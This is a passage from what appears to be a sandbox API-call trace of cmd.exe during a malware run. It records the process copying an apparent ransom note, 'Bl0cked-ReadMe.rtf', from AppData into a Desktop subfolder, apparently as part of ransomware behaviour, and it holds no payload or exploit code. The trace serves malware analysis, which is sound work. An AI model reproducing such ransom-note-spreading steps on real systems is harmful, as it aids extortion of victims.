lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x9, lpcbData=0x18ee08*=0x4) returned 0x0 [0141.829] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x9, lpcbData=0x18ee08*=0x1000) returned 0x2 [0141.829] RegCloseKey (hKey=0x40) returned 0x0 [0141.829] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.829] srand (_Seed=0x5b886370) [0141.829] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"" [0141.829] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"" [0141.829] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.829] 
GetModuleFileNameW (in: hModule=0x0, lpFilename=0x241908, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.830] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.830] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.830] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.830] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.830] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.830] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.830] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.830] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.830] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.830] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.830] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.830] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.830] GetEnvironmentStringsW () returned 0x2422f8* [0141.830] FreeEnvironmentStringsW (penv=0x2422f8) returned 1 [0141.830] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.830] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.830] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.830] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.830] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 
[0141.830] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.830] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.830] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.830] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.830] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.830] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fbd0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.830] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fbd0, lpFilePart=0x18fbcc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fbcc*="Desktop") returned 0x18 [0141.830] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.831] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f94c | out: lpFindFileData=0x18f94c) returned 0x240038 [0141.831] FindClose (in: hFindFile=0x240038 | out: hFindFile=0x240038) returned 1 [0141.831] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f94c | out: lpFindFileData=0x18f94c) returned 0x240038 [0141.831] FindClose (in: hFindFile=0x240038 | out: hFindFile=0x240038) returned 1 [0141.831] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f94c | out: lpFindFileData=0x18f94c) returned 0x240038 [0141.831] FindClose (in: hFindFile=0x240038 | out: hFindFile=0x240038) returned 1 [0141.831] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.831] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.831] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.831] GetEnvironmentStringsW () returned 0x242b18* [0141.831] FreeEnvironmentStringsW (penv=0x242b18) returned 1 
[0141.831] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.832] GetConsoleOutputCP () returned 0x1b5 [0141.832] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.832] GetUserDefaultLCID () returned 0x409 [0141.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fd10, cchData=128 | out: lpLCData="0") returned 2 [0141.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fd10, cchData=128 | out: lpLCData="0") returned 2 [0141.832] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fd10, cchData=128 | out: lpLCData="1") returned 2 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.833] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, 
lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.833] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.834] GetConsoleTitleW (in: lpConsoleTitle=0x2308f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.834] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.834] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.834] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.834] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.835] _wcsicmp (_String1="type", _String2=")") returned 75 [0141.835] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0141.835] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0141.835] _wcsicmp (_String1="IF", _String2="type") returned -11 [0141.835] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0141.835] _wcsicmp (_String1="REM", _String2="type") returned -2 [0141.835] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0141.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.839] GetFileType (hFile=0x7) returned 0x2 [0142.280] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.280] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18fc08 | out: lpMode=0x18fc08) returned 1 [0142.280] _dup (_FileHandle=1) returned 3 [0142.280] _close (_FileHandle=1) returned 0 [0142.286] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0142.286] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x18fbd8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0142.287] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0142.287] GetConsoleTitleW (in: lpConsoleTitle=0x18fa08, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.288] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0142.288] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0142.288] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0142.288] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0142.288] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.289] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x18f56c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f56c) returned 0x230ea0 [0142.289] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0142.289] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0142.289] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0142.289] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18e478, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0142.289] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0142.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.289] GetFileType (hFile=0x54) returned 0x1 [0142.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.289] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x18e4d0 | out: lpFileSizeHigh=0x18e4d0*=0x0) returned 0x1632 [0142.289] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0142.289] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.290] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.290] GetFileType (hFile=0x4c) returned 0x1 [0142.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.290] GetFileType (hFile=0x4c) returned 0x1 [0142.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.290] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] GetFileType (hFile=0x4c) returned 0x1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] GetFileType (hFile=0x4c) returned 0x1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] GetFileType (hFile=0x4c) returned 0x1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] GetFileType (hFile=0x4c) returned 0x1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] GetFileType (hFile=0x4c) returned 0x1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] GetFileType (hFile=0x4c) returned 0x1 [0142.291] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.291] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.291] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.292] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.292] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.292] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.292] GetFileType (hFile=0x4c) returned 0x1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0142.292] GetFileType (hFile=0x4c) returned 0x1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.292] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.292] GetFileType (hFile=0x4c) returned 0x1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.292] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.292] GetFileType (hFile=0x4c) returned 0x1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.292] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.292] GetFileType (hFile=0x4c) returned 0x1 [0142.292] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.292] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] GetFileType (hFile=0x4c) returned 0x1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] GetFileType (hFile=0x4c) 
returned 0x1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] GetFileType (hFile=0x4c) returned 0x1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.293] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.293] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] GetFileType (hFile=0x4c) returned 0x1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] GetFileType (hFile=0x4c) returned 0x1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] GetFileType (hFile=0x4c) returned 0x1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, 
lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] GetFileType (hFile=0x4c) returned 0x1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.293] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.293] GetFileType (hFile=0x4c) returned 0x1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] GetFileType (hFile=0x4c) returned 0x1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] GetFileType (hFile=0x4c) returned 0x1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] GetFileType (hFile=0x4c) returned 0x1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, 
lpOverlapped=0x0) returned 1 [0142.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.294] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.294] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.294] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x200, lpOverlapped=0x0) returned 1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] GetFileType (hFile=0x4c) returned 0x1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] GetFileType (hFile=0x4c) returned 0x1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] GetFileType (hFile=0x4c) returned 0x1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] WriteFile (in: hFile=0x4c, lpBuffer=0x18f358*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f358*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] GetFileType (hFile=0x4c) returned 0x1 [0142.294] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.294] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3a8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] GetFileType (hFile=0x4c) returned 0x1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] WriteFile (in: hFile=0x4c, 
lpBuffer=0x18f3f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f3f8*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] GetFileType (hFile=0x4c) returned 0x1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] WriteFile (in: hFile=0x4c, lpBuffer=0x18f448*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f448*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] GetFileType (hFile=0x4c) returned 0x1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] WriteFile (in: hFile=0x4c, lpBuffer=0x18f498*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f498*, lpNumberOfBytesWritten=0x18e4ec*=0x50, lpOverlapped=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] GetFileType (hFile=0x4c) returned 0x1 [0142.295] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.295] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.295] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.295] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: 